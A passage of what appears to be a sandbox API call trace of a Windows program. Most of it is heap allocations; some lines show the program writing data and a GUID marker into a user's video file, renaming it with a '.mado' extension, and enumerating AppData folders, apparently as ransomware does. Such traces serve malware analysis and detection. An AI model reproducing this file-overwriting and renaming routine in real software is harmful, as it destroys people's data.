Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fea60 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea48 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6edb0 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eec8 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.746] GetCurrentThreadId () returned 0x600 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69d28 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.747] GetCurrentThreadId () returned 0x600 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.748] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8a0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.748] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.749] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.749] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.749] CloseHandle (hObject=0x63c) returned 1 [0205.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.750] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\VcusBvwFBr_p.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\vcusbvwfbr_p.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\VcusBvwFBr_p.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\vcusbvwfbr_p.mp4.mado")) returned 1 [0205.751] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78440d10, ftCreationTime.dwHighDateTime=0x1d5e2a3, ftLastAccessTime.dwLowDateTime=0xdfba34a0, ftLastAccessTime.dwHighDateTime=0x1d5dbba, ftLastWriteTime.dwLowDateTime=0xdfba34a0, ftLastWriteTime.dwHighDateTime=0x1d5dbba, nFileSizeHigh=0x0, nFileSizeLow=0x8a0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VcusBvwFBr_p.mp4", cAlternateFileName="VCUSBV~1.MP4")) returned 0 [0205.751] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.751] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.751] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0205.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0205.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.752] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.752] PathFindFileNameW (pszPath="") returned="" [0205.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0205.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.753] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.753] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9250 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0205.753] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0205.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0205.753] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0205.753] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.754] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0205.754] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0205.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.754] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.754] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.754] PathFindFileNameW (pszPath="") returned="" [0205.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0205.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.756] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.756] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e5258 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.756] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef128 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.756] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.756] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0205.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.757] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3b72b80 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef2f0 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef388 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef420 [0205.757] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6be20 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0205.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0205.757] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 